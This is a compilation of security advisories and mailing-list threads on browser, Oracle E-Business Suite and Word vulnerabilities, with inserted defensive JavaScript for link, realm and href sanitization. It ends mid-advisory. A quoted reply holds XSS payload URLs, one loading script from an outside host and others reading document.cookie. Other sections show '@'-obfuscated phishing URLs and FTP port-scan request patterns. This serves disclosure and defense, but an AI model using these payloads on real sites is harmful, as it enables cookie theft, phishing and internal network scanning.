CVE-2010-2404 | Persistent Cross Site Scripting Vulnerability in Oracle I-Recruitment - E-Business Suite
Advisory: Persistent Cross Site Scripting Vulnerability in Oracle I-Recruitment File Uploading Module - E-Business Suite
CVE-2010-2404

Version Affected: 11.5.10.2, 12.0.6, 12.1.3

About Oracle I-Recruitment Suite:
Oracle iRecruitment is a web-based, full-cycle recruiting solution that gives managers, recruiters and candidates the ability to manage every phase of finding, recruiting, hiring and tracking new employees. It is a part of Oracle E-Business Suite.

Discussion:
A persistent cross-site scripting vulnerability exists in the I-Recruitment portal. The account information page allows the user to upload his resume as a Microsoft Word document. An attacker can construct a malicious MS Word file to conduct an XSS attack by placing the XSS payload in hyperlinks in order to bypass the conversion filters. For attack details, refer to the following paper:
http://secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf

Disclosure:
The vulnerability was disclosed to Oracle in January 2009 and is patched in the October 2010 CPU release.

Credit: Aditya K Sood of SecNiche Security
Contact: adi_ks [at] secniche.org

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything.
CVE-2010-3200 : Microsoft Word 2003 MSO Null Pointer Dereference Vulnerability
Advisory: Microsoft Word 2003 MSO Null Pointer Dereference Vulnerability
CVE: 2010-3200

Version: Word 2003 (SP3) 11.8326.11.8324, tested on Windows XP SP2/SP3

Details:
A null pointer dereference vulnerability has been noticed in MS Word. The exception occurs in the MSO.dll library, which fails to handle a specially crafted buffer in a file. The issue can be triggered by opening a malicious Word file, which results in a null pointer exception due to an invalid memory read.

Note: It has intermediate impact because if the system is running (n) instances of MS Word, opening this malicious doc file crashes all of the instances, thereby completely subverting the functionality of Word.

The following state of registers and frames was noticed:

eax= ebx= ecx=02711d68 edx= esi= edi=008c1b1c
eip=30f91fd7 esp=0013cca0 ebp=0013ccb4 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00210282
mso!Ordinal1033+0x3f4:
30f91fd7 8b481c mov ecx,dword ptr [eax+1Ch] ds:0023:001c=

0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0013ccb4 30f16d61 mso!Ordinal1033+0x3f4
0013ccdc 30ef266f mso!Ordinal2272+0xad
0013cdc8 30f16951 mso!Ordinal233+0x596
mso!Ordinal1307+0xc0e

0:000> u
mso!Ordinal1033+0x3f4:
30f91fd7 8b481c mov ecx,dword ptr [eax+1Ch]
30f91fda f6c101 test cl,1
30f91fdd 0f85f3b20900 jne mso!Ordinal2868+0x2eb87 (3102d2d6)
30f91fe3 8b701c mov esi,dword ptr [eax+1Ch]
30f91fe6 83e601 and esi,1
30f91fe9 753a jne mso!Ordinal1033+0x442 (30f92025)
30f91feb 8b4848 mov ecx,dword ptr [eax+48h]
30f91fee 2bd1 sub edx,ecx

Basic Block:
30f91fd7 mov ecx,dword ptr [eax+1ch]
Tainted Input Operands: eax
30f91fda test cl,1
Tainted Input Operands: cl
30f91fdd jne mso!ordinal2868+0x2eb87 (3102d2d6)
Tainted Input Operands: ZeroFlag

Proof of Concept:
The required proof of concept is available at the below mentioned link:
http://www.secniche.org/word_crash_11.8326.8324_poc.zip

Vendor Response:
The vulnerability was reported to Microsoft. Due to the nature of the inherent crash, no separate bulletin will be released. The issue will be patched or corrected in the next development release.

Regards
Aditya K Sood
Re: Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)
Hi Tim

First of all, the dialog spoofing issue still works in Google Chrome and it has not been patched. A lot of tests have been conducted considering different variants of spoofing.

I missed your paper previously. I must say it's a very good read.

A similar issue about Google URL obfuscation, which still persists because it has been mentioned by the team itself that some stuff is based on the standards of HTTP protocol handler authentication schemes (http://www.nice@evil.com). The link is as follows:
http://code.google.com/p/chromium/issues/detail?id=4739

Further, it has been mentioned several times that it is a legitimate attack point used by phishers. For example:
http://code.google.com/p/browsersec/wiki/Part3#HTTP_authentication

Even this issue is not patched. Maybe URL protection like Mozilla's is a good practice. Further, Mozilla has worked pretty fine after the dialog spoofing vulnerability disclosed by Aviv Raff at the below mentioned link:
http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx

We have used a well defined PHP script in this demo, combined with a URL obfuscation issue. Since spoofing aims at manipulating the security features in user interfaces, it requires a new model dialog for HTTP authentication that should disseminate the realm value from the domain name. Restricting the string length of the realm value could be a good lead here.

Kind Regards
Aditya

Tim wrote:
> Hi Aditya,
>
>> Google Chrome (5.0.375.127 and previous versions) suffers from HTTP Auth Dialog spoofing vulnerability due to possible realm manipulation in the HTTP header. Previously, Google chrome has got a similar bug which can be seen on the following link
>
> How is this significantly different than the issues described in:
> http://www.vsecurity.com/download/papers/WeaningTheWebOffOfSessionCookies.pdf ?
> See the section on page 11 entitled "Weak User Interfaces for HTTP Authentication".
>
> In your video, I didn't see precisely what realm string was sent or what the overall auth header was, so it's hard to tell. Also, it may be that variants of these attacks still work in Firefox.
>
> Note that the above paper was sent to all major browser vendors around the time that Google was notified about (and fixed) this bug:
> http://code.google.com/p/chromium/issues/detail?id=32718
>
> tim
Re: Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)
Hi Tim

You can have a look at the screenshot at the below mentioned link:
http://www.secniche.org/goog_chr_auth_spoof.jpg

Kind Regards
Aditya

Tim wrote:
> Aditya,
>
>> First of all, the dialog spoofing issue still works in Google Chrome and it has not been patched.
>
> I'm not surprised. There didn't seem to be a lot of interest in these issues from any browser vendor when I brought them to their attention.
>
>> A lot of tests have been conducted considering different variants of spoofing. I missed your paper previously. I must say it's a very good read.
>
> Not a problem; the paper only addressed this topic tangentially. I only brought it up because I wasn't sure how things had changed since I last tested and thought you could enlighten me.
>
>> Further, it has been mentioned several times that it is a legitimate attack point used by phishers. For example:
>> http://code.google.com/p/browsersec/wiki/Part3#HTTP_authentication
>
> Yup, the attack scenario I described came straight from the BSH, though I didn't mess around with the password-in-URL stuff.
>
>> Even this issue is not patched. Maybe URL protection like Mozilla's is a good practice. Further, Mozilla has worked pretty fine after the dialog spoofing vulnerability disclosed by Aviv Raff at the below mentioned link:
>> http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx
>
> Ah, nice, I didn't see this one when I was last testing this stuff.
>
>> We have used a well defined PHP script in this demo, combined with a URL obfuscation issue. Since spoofing aims at manipulating the security features in user interfaces, it requires a new model dialog for HTTP authentication that should disseminate the realm value from the domain name. Restricting the string length of the realm value could be a good lead here.
>
> More usefully, the realm should be clearly separated from the domain and labeled in the dialog like Opera does it. See the screenshot of that in my paper. There could still be some confusion, but it's clearly much better than trying to embed potentially malicious strings within the same sentences as more carefully validated ones (the domain).
>
> So, once again, could you send the realm string/auth header you were setting in that demo?
>
> thanks,
> tim
Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)
Hi

Google Chrome (5.0.375.127 and previous versions) suffers from an HTTP Auth Dialog spoofing vulnerability due to possible realm manipulation in the HTTP header. Previously, Google Chrome had a similar bug, which can be seen at the following link:
http://code.google.com/p/chromium/issues/detail?id=36772

This bug was actually patched. The issue mentioned in this bug was dialog spoofing due to long sub domain names. The patch worked only for the specific case which was outlined in that bug. A number of tests have been conducted on Google Chrome which verify the inefficiency of Google Chrome in scrutinizing the type of realm value set in the header. It can be tampered with using double quotes and single quotes in a definite manner.

As mentioned in RFC 2617:

"The realm directive (case-insensitive) is required for all authentication schemes that issue a challenge. The realm value (case-sensitive), in combination with the canonical root URL (the absolute URI for the server whose abs_path is empty; see http://greenbytes.de/tech/webdav/rfc2617.html#RFC2616) of the server being accessed, defines the protection space. These realms allow the protected resources on a server to be partitioned into a set of protection spaces, each with its own authentication scheme and/or authorization database. The realm value is a string, generally assigned by the origin server, which may have additional semantics specific to the authentication scheme. Note that there may be multiple challenges with the same auth-scheme but different realms."

So, the realm value plays a critical role in determining the framework of HTTP access authentication for a particular resource. It has been analyzed that it is possible to spoof the HTTP Auth dialog by playing around with realm values. This attack scenario can be used to launch phishing attacks and steal sensitive information from legitimate websites.

As has been released before, Google Chrome fails to sanitize the obfuscated URL and redirects it to a different domain. This potential flaw can be combined with the HTTP Auth dialog spoofing to launch attacks against legitimate websites.

An appropriate POC video has been released at the below mentioned links:
http://www.youtube.com/watch?v=r1KuE2th_EY
http://secniche.org/videos/goog_http_auth_realm_mani.html
(Note: A comparative test against Firefox has been placed in the video itself)

Kind Regards
Aditya K Sood
http://www.secniche.org
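As an added example, not part of the original post or of Chrome's code, here is how an HTTP authentication prompt can be built so that the origin the browser actually connected to stays separate from the server-supplied realm, which is what the thread asks for: the challenge is parsed per RFC 2617 (a quoted-string realm with backslash escapes, where quote tricks live), control characters and excess length in the realm are neutralized, and the realm is shown on its own labelled line. The names `parseChallenge`, `sanitizeRealm` and `buildAuthPrompt` are this example's own.

```javascript
// Added example: a defender-side model of the HTTP auth dialog discussed in
// the thread. Function names are this example's own, not Chrome's.

// Parse a WWW-Authenticate value ('Basic realm="x"', 'Digest realm=..., nonce=...')
// into { scheme, params }. Quoted strings may contain backslash-escaped
// characters (RFC 2617); the parser returns null on anything malformed
// (unbalanced quote, stray text) instead of guessing a realm.
function parseChallenge(header) {
  const m = /^\s*([A-Za-z][A-Za-z0-9._~+-]*)\s*([\s\S]*)$/.exec(header);
  if (m === null) return null;
  const scheme = m[1];
  const params = {};
  let rest = m[2];
  // key=value pairs separated by commas; value is a quoted-string or a bare token
  const pair = /^\s*,?\s*([A-Za-z0-9._~+-]+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^\s,"]+))\s*/;
  while (rest.length > 0) {
    const p = pair.exec(rest);
    if (p === null) return null;
    const key = p[1].toLowerCase();
    const value = p[2] !== undefined ? p[2].replace(/\\(.)/g, "$1") : p[3];
    params[key] = value;
    rest = rest.slice(p[0].length);
  }
  return { scheme, params };
}

// Make the server-controlled realm safe to display: no control characters
// (which could fake line breaks in the dialog), collapsed whitespace, and a
// hard length limit, as suggested in the thread.
function sanitizeRealm(realm, maxLen = 40) {
  let text = String(realm)
    .replace(/[\u0000-\u001f\u007f]+/g, " ")
    .replace(/\s+/g, " ")
    .trim();
  const truncated = text.length > maxLen;
  if (truncated) text = text.slice(0, maxLen) + "...";
  return { text, truncated };
}

// Build the prompt. The origin comes only from the URL the request was sent
// to, so "http://www.nice@evil.com" yields "http://evil.com", never "www.nice";
// the realm sits on its own labelled line and cannot rewrite the first one.
function buildAuthPrompt(requestUrl, header) {
  const challenge = parseChallenge(header);
  if (challenge === null || !("realm" in challenge.params)) return null;
  const origin = new URL(requestUrl).origin;
  const realm = sanitizeRealm(challenge.params.realm);
  return {
    scheme: challenge.scheme,
    origin,
    realm: realm.text,
    truncated: realm.truncated,
    lines: [
      `${origin} requires a username and password (${challenge.scheme}).`,
      `The site's own description of this area, which is not verified: "${realm.text}"` +
        (realm.truncated ? " [truncated]" : ""),
    ],
  };
}
```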
Re: [WEB SECURITY] Re: Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw
Hi Berend-Jan

Please find the respective responses below.

> Repro steps:
>
> 1) Some websites do not sanitize user input correctly, such as the one in your example, which allows things like XSS:
> http://www.worksafenb.ca/redirect.asp?V=;'%20src=http://skypher.com/SkyLined/xss.js/SCRIPTSCRIPT%20x='
> http://www.worksafenb.ca/redirect.asp?V=*//SCRIPTSCRIPTalert(document.cookie);/*
> http://www.worksafenb.ca/redirect.asp?V=*/%3C/SCRIPT%3E%22%3CSCRIPT%3Ealert%28document.cookie%29;/*
>
> 2) This may also allow the '@' character to be inserted into a link on the site, which has special meaning in URLs, as described in http://www.ietf.org/rfc/rfc1738.txt:
>
>   3.1. Common Internet Scheme Syntax
>   While the syntax for the rest of the URL may vary depending on the particular scheme selected, URL schemes that involve the direct use of an IP-based protocol to a specified host on the Internet use a common syntax for the scheme-specific data:
>   //user:password@host:port/url-path
>
> 3) Because Chromium follows the RFC and parses the URL correctly, a user that clicks on the link will be taken to the site specified by the URL.
>
> As you can see, I unfortunately fail to understand why this is a design flaw in Chromium. It seems to me that you are suggesting that Chromium add a feature to mitigate this server-side problem by ignoring the RFC and prevent all links with an @ sign in them from working altogether like MSIE does, or warn the user about such URLs like Firefox does? I am obviously missing something here, maybe you can elaborate even further?

The point is not one of implementation. The URL/URI specification provided in the RFC is treated as the standard benchmark, but the point here is about the security check which is not implemented in Chrome. Every time this issue comes up, the point of status bar link interpretation is discussed, which is simply one point of just showing the way links are active in a web page. The web page input problem is always a case, but the browser problems make it more adverse.

> I don't want to take too much of your precious time as a researcher, so I reported this feature request for you:
> http://code.google.com/p/chromium/issues/detail?id=31625
>
> You mentioned that you have reported this before but I couldn't find any bugs relating to this:
> http://code.google.com/p/chromium/issues/list?can=1&q=reporter:Adi.ZeroK
> http://code.google.com/p/chromium/issues/list?can=1&q=reporter:Adi.ZeroK&sort=-id&colspec=ID+Summary+Status+Modified+Type+Restrict+Pri+Mstone+Owner&x=mstone&y=area&cells=tiles
>
> Maybe you could find them and mark as duplicates of this bug yourself (or the other way around)?

I am not sure about the fact that you have not found that. It was reported on 28 November 2008 and the status was changed to Won't Fix by the team itself. You can have a look at:
http://code.google.com/p/chromium/issues/detail?id=4739

I think this can clear the point. It's the same point which I have been mentioning for a long time. We just want that issues should be patched so that users can have a better experience.

Kind Regards
Aditya

> Thanks!
>
> SkyLined
> Berend-Jan Wever berendjanwe...@gmail.com
> http://skypher.com/SkyLined
>
> On Tue, Jan 5, 2010 at 3:02 PM, Aditya K Sood 0kn...@secniche.org wrote:
>> Hi
>>
>> Recently, with the outcome of the OWASP RC1 top 10 exploited vulnerability list, redirection issues have already made a mark in it. Even the WASC has included URL abuse as one of the stringent attacks. Well, to be ethical in this regard, these are not recent attacks but have been persisting for a long time. The only difference is that the exploitation ratio has increased from bottom to top. So that's the prime reason it has been included in the web application security benchmarks. But the projection of redirection attacks is active now.
>>
>> This post is not about explaining the basics of redirection issues. It is more about the design vulnerabilities in browsers that can lead to potential persistent redirection vulnerabilities. Web application security can be hampered due to browser problems.
>>
>> Note: The base is to project the implications of browser inefficiency and the ease in conducting web application attacks.
>>
>> Post: http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html
>> Video: http://www.secniche.org/videos/google_chrome_link_inj.html
>>
>> Browsers need to take care of these issues.
>>
>> Regards
>> Aditya K Sood
>> http://www.secniche.org
Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw
Hi

Recently, with the outcome of the OWASP RC1 top 10 exploited vulnerability list, redirection issues have already made a mark in it. Even the WASC has included URL abuse as one of the stringent attacks. Well, to be ethical in this regard, these are not recent attacks but have been persisting for a long time. The only difference is that the exploitation ratio has increased from bottom to top. So that's the prime reason it has been included in the web application security benchmarks. But the projection of redirection attacks is active now.

This post is not about explaining the basics of redirection issues. It is more about the design vulnerabilities in browsers that can lead to potential persistent redirection vulnerabilities. Web application security can be hampered due to browser problems.

Note: The base is to project the implications of browser inefficiency and the ease in conducting web application attacks.

Post: http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html
Video: http://www.secniche.org/videos/google_chrome_link_inj.html

Browsers need to take care of these issues.

Regards
Aditya K Sood
http://www.secniche.org
Advisory - Gmail/Google Doc PDF Repurposing Integrated Attacks - Cookie Hijacking / Stealing
Hi

The Google Docs network was vulnerable to PDF repurposing attacks. The vulnerability was disclosed to Google with discretion. This was done to mitigate the risk. Google worked on it and patched it within a period of 5 days. Google Docs has been refined now and the integrated support for the Adobe plugin is removed.

User security was the prime issue because millions of users were at risk if this attack persisted in the open environment. Integrated accounts were more susceptible, as certain stolen credentials could be used to access accounts.

The advisory is released here:
http://secniche.org/gmd_hijack/gc_hijack.xhtml
http://secniche.org/gmd_hijack/advisory_gmail_google_docs_pdf_repurposing_attack.pdf

Regards
Aditya KS
http://www.secniche.org
[SecNiche WhitePaper ] - PDF Silent HTTP Form Repurposing Attacks
Hi

This paper sheds light on a modified approach to trigger web attacks through the JavaScript protocol handler in the context of the browser when a PDF is opened in it. As we have seen, Adobe implemented a security mechanism in order to remove the insecurities that originate directly from a standalone PDF document and to circumvent cross-domain access. The attack is targeted at web applications that allow PDF documents to be uploaded to the web server.

http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf

Regards
Aditya KS
http://www.secniche.org
In Response to Bid 34130 Invalid
The observed behavior is explained at the below mentioned link:
http://zeroknock.blogspot.com/2009/04/google-chrome-alert-single-thread-out.html

This vulnerability persists in newer versions of Google Chrome too.
Microsoft Internet Explorer 8 - Anti Spoofing is a Myth
Hi

With the new features implemented in IE 8, the status address bar has been transformed too. The new step taken by the Microsoft IE team, which is not to show the address of the selected link in the status bar, can have a serious impact. A user will not be able to see the active link in the status bar. This looks like an implementation of a security solution through obscurity.

The status bar is required for a link integrity check that assures a user about the legitimate website. We are not considering the ingrained vulnerabilities of status address bar spoofing in browsers at this point of time. Browsers like Mozilla, Chrome etc. have well designed and effective status address bars.

For the detailed issue:
http://www.secniche.org/ie_spoof_myth/

Regards
Aditya K Sood
http://www.secniche.org
[SecNiche Whitepaper] Evading Web XSS Filters with Microsoft Word - WAPT Perspective
Hi

This paper exposes a new attack vector for testing web applications having upload functionality. It enhances the web application penetration testing perspective by demonstrating a new way to produce XSS in web applications when a Word document is rendered directly in the browser. This attack has been tested on a number of enterprise web applications and is successfully triggered. The vendors have been given advisories in relation to this attack vector. It works fine with custom designed web applications in a distributed environment. Sometimes enhanced functionality in software leads to the generation of new attack vectors.

You can download the paper at:
http://www.secniche.org/paper.html
http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf

Regards
Aditya K Sood
Founder, SecNiche Security
http://www.secniche.org
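The conversion filters that this paper and the Oracle I-Recruitment advisory (CVE-2010-2404, above) concern fail on hyperlink targets, so here is an added example, not from the paper or from any vendor's converter, of the href allowlist a document-to-HTML converter should apply to every anchor it emits: entity-encoded and whitespace-padded scheme names are normalized before the scheme is checked, and only http, https, mailto and relative targets survive. `safeHref` and `rewriteAnchors` are this example's own names.

```javascript
// Added example: an href allowlist for HTML produced by a document converter.
// Function names are this example's own; no vendor's filter is reproduced.

const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'",
                         colon: ":", Tab: "\t", NewLine: "\n", nbsp: "\u00a0" };

// Decode numeric (&#106; &#x6A;) and the few named entities that matter for
// disguising a scheme, so "&#106;avascript:" is seen as "javascript:".
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (whole, body) => {
    if (body[0] === "#") {
      const cp = body[1].toLowerCase() === "x"
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
    }
    return body in NAMED_ENTITIES ? NAMED_ENTITIES[body] : whole;
  });
}

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Returns a cleaned href, or null if the target must be dropped.
function safeHref(rawHref) {
  let href = decodeEntities(String(rawHref));
  // Browsers drop ASCII tab/newline anywhere in a URL and strip leading and
  // trailing control characters and spaces, so "java\tscript:" still runs;
  // mirror that normalization before looking at the scheme.
  href = href.replace(/[\t\n\r]/g, "").replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  if (href === "") return null;
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(href);
  if (scheme !== null && !ALLOWED_SCHEMES.has(scheme[1].toLowerCase())) return null;
  // Any remaining control character has no business in a link target.
  if (/[\u0000-\u001f\u007f]/.test(href)) return null;
  return href;
}

// Rewrite href attributes in converter output, neutralising bad targets with
// "#" so the link text stays in place. A regex over attributes is a
// simplification adequate for the flat HTML such converters emit; a real
// pipeline would walk a DOM and also strip event-handler attributes.
function rewriteAnchors(html) {
  return html.replace(/(<a\b[^>]*?\shref\s*=\s*)(?:"([^"]*)"|'([^']*)')/gi,
    (whole, prefix, dq, sq) => {
      const cleaned = safeHref(dq !== undefined ? dq : sq);
      const value = cleaned === null
        ? "#"
        : cleaned.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
      return `${prefix}"${value}"`;
    });
}
```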
Advisory: Google Chrome 1.0.154.43 ClickJacking Vulnerability.
Version Affected: Chrome/1.0.154.43 and previous too

Description:
The Google Chrome browser is vulnerable to a clickjacking flaw. A clickjacked page tricks a user into performing undesired actions by clicking on a concealed link. Attackers can trick users into performing actions which the users never intended to do, and there is no way of tracing such actions later, as the user was genuinely authenticated on the other page.

Proof of Concept:
http://www.secniche.org/gcr_clkj

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on the Microsoft Windows XP SP2 platform. The versions tested are: Chrome/1.0.154.43

Disclosure Timeline:
Disclosed: 27 January 2009
Release Date: 28 January 2009

Vendor Response:
Google acknowledges this vulnerability and is already working on it.

Credit: Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory: Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability
Version Affected:
Oracle E-Business Suite Release 12, version 12.0.6
Oracle E-Business Suite Release 11i, version 11.5.10.2

CVE: 2008-5446

Description:
Oracle E-Business Suite, including applications like I-Recruitment etc., is vulnerable to a flaw which leads to sensitive information disclosure about the deployment of the Oracle application and server in a production environment. The flaw persists in the E-Business Suite code, which allows a malicious user to steal sensitive information through the About Us page (shipped with E-Business Suite) by allowing guest access. In addition to this, straightforward access is granted to an attacker to steal all the information, which provides a potential attack surface for conducting stringent attacks. The severity gets higher because of the type of information revealed. This can be structured over two end points:
1. If an application is hosted on the internet with an external interface.
2. If an application is hosted in an organization's production environment.

Proof of Concept:
Refer to the whitepaper for detailed information:
http://secniche.org/papers/orabs.pdf

Detection:
SecNiche confirmed this vulnerability affects the Oracle versions listed above.

Disclosure Timeline:
Disclosed: 25 Sept 2008
Reply: 26 Sept 2008
Oracle Fix and Release Date: 13 January 2009

Links:
http://www.secniche.org/orabs.html
http://evilfingers.com/advisory/index.php

Vendor Response:
Oracle acknowledges this vulnerability and a fix has been released in the Critical Patch Update of 13 January 2009.
Oracle Critical Patch Update: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

Credit: Oracle credited Aditya K Sood for discovering this vulnerability.

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.
Advisory: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.

Version Affected: Google Chrome 1.0.154.36

Description:
The Google Chrome FTP client is vulnerable to an FTP PASV malicious port scanning vulnerability. The username in the FTP URL (ftp://username:passw...@domain.com) can be manipulated by tampering it with a certain IP address and a port specification, as in (ftp://xxx.xxx.xxx.xxx-22:passw...@domain.com). The Google Chrome FTP client makes a connection to the rogue FTP server, which uses PASV commands to scan the network. Dynamic requests are issued to a rogue FTP server which accepts connections with different usernames as the IP address with specified ports, to locate a non-existing object on the target domain.

Request 1: ftp://xxx.xxx.xxx.xxx-21:passw...@domain.com
Request 2: ftp://xxx.xxx.xxx.xxx-22:passw...@domain.com
Request 3: ftp://xxx.xxx.xxx.xxx-23:passw...@domain.com
Request 4: ftp://xxx.xxx.xxx.xxx-25:passw...@domain.com

JavaScript port scanning is used to exploit this issue. A malicious web page hosted on a specially coded FTP server could use this feature to perform a generic port scan of machines inside the firewall of the victim. The generated fraudulent requests help the attacker to expose internal network information through sustained port scanning via JavaScript.

Proof of Concept:
http://www.secniche.org/gcfpv

Links:
http://secniche.org/gcfps.html
http://evilfingers.com/advisory/index.php

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on the Microsoft Windows XP SP2 platform. The versions tested are: Chrome 1.0.154.36

Disclosure Timeline:
Disclosed: 1 January 2009
Release Date: 4 January 2009

Vendor Response:
Google acknowledges this vulnerability by reproducing the issue. Views have been exchanged over the severity level of this flaw. The Chrome ID of this issue is 5978.

Credit: Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Google Chrome MetaCharacter URI Obfuscation Vulnerability
Advisory: Google Chrome MetaCharacter URI Obfuscation Vulnerability.

Version Affected: All
Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27

Description:
Google Chrome is vulnerable to a URI obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link cannot be traversed properly in the status address bar. This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. A URI specified with the @ character, with or without a NULL character, causes the vulnerability.

Proof of Concept:
http://www.secniche.org/gcuri/index.html
http://www.secniche.org/gcuri
http://evilfingers.com/advisory/index.php

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on the Microsoft Windows XP SP2 platform. The versions tested are: Chrome/0.2.149.30, Chrome/0.2.149.29

Disclosure Timeline:
Disclosed: 24 November 2008
Release Date: 24 November 2008

Vendor Response:
Reported to Google.

Credit: Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
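The @ and NUL obfuscation described in this advisory and the "//user:password@host:port/" rule quoted from RFC 1738 in the link injection thread above call for the same defensive check, so here is one added example (not code from the posts or from Chromium): a link-integrity pass over page anchors that uses the WHATWG URL parser to find the host the browser will really connect to and flags links whose visible text, or whose userinfo part, reads like a different host. The names `perceivedHost`, `checkLink`, `suspiciousLinks`, the base URL `https://site.example/` and the sample anchors are this example's own constructions.

```javascript
// Added example: a link-integrity check a page scanner, proxy or status-bar
// renderer could apply. Names and sample data are constructed for this example.

// First hostname-looking token in what the user sees. "http://www.nice@evil.com"
// reads as "www.nice" to a person, which is the perception the '@' trick exploits.
function perceivedHost(text) {
  const m = /([a-z0-9-]+(?:\.[a-z0-9-]+)+)/i.exec(text || "");
  return m === null ? null : m[1].toLowerCase();
}

function checkLink(href, visibleText, baseUrl = "https://site.example/") {
  const findings = [];
  let url;
  try {
    url = new URL(href, baseUrl);      // resolves relative hrefs, rejects garbage
  } catch (e) {
    return { href, host: null, findings: ["unparseable-url"] };
  }
  const host = url.hostname.toLowerCase();

  if (url.protocol !== "http:" && url.protocol !== "https:") {
    findings.push("non-web-scheme:" + url.protocol);   // e.g. ftp: with userinfo
  }
  if (url.username !== "" || url.password !== "") {
    // Everything before '@' is userinfo (RFC 1738 3.1), not the destination host.
    findings.push("credentials-in-url");
    if (perceivedHost(url.username) !== null) findings.push("userinfo-looks-like-host");
  }
  if (/[\u0000-\u001f\u007f]/.test(href)) {
    findings.push("control-chars-in-href");            // NUL/tab/newline padding
  }
  const shown = perceivedHost(visibleText);
  if (shown !== null && shown !== host && !host.endsWith("." + shown)) {
    findings.push(`host-mismatch:${shown}->${host}`);
  }
  return { href, host, findings };
}

// Run over a batch of anchors and keep only the suspicious ones, which is what
// a scanner would surface in a log or a status bar would warn about.
function suspiciousLinks(anchors) {
  return anchors
    .map(a => checkLink(a.href, a.text))
    .filter(r => r.findings.length > 0);
}

// Constructed sample anchors (not taken from any real page).
const SAMPLE_ANCHORS = [
  { href: "/about", text: "About us" },
  { href: "https://docs.bank.example/help", text: "docs.bank.example help" },
  { href: "http://www.nice@evil.com", text: "http://www.nice@evil.com" },
  { href: "http://www.good.example\u0000@evil.example/", text: "www.good.example" },
  { href: "ftp://203.0.113.5-22:pass@files.example/", text: "files.example" },
];
```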
Google Chrome Onbeforeunload and Onunload Null Check Vulnerability.
Advisory: Google Chrome Onbeforeunload and Onunload Null Check Vulnerability.

Version Affected:
Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27

Description:
Google Chrome is susceptible to stringent behavior while handling the onbeforeunload and onunload events in body tags. A malicious script renders the browser useless when an event is created in any kind of loop. As a result, the browser cannot be closed and remains in a useless state. It is possible to trigger it automatically with a redirect clause, which can be used by a malicious attacker to trick users. In certain conditions it can be used for browser-based denial of service.

Proof of Concept:
http://www.secniche.org/gwobl/poc.html
http://www.secniche.org/gwobl/index.html

Links:
http://www.secniche.org/advisory.html
http://evilfingers.com/advisory/index.php

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on the Microsoft Windows XP SP2 platform. The versions tested are: Chrome/0.2.149.30, Chrome/0.2.149.29

Disclosure Timeline:
Disclosed: 19 October 2008
Release Date: 21 October 2008

Vendor Response:
Google acknowledges this vulnerability and a fix will be released soon.

Credit: Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory: Mozilla Firefox User Interface Null Pointer Dereference Dispatcher Crash and Remote Denial of Service.
Mozilla Firefox User Interface Null Pointer Dereference Dispatcher Crash and Remote Denial of Service.

Version Tested: Mozilla 3.0.3 - 1.9.0 Branch (specifically for the latest version)

Severity: High

Description:
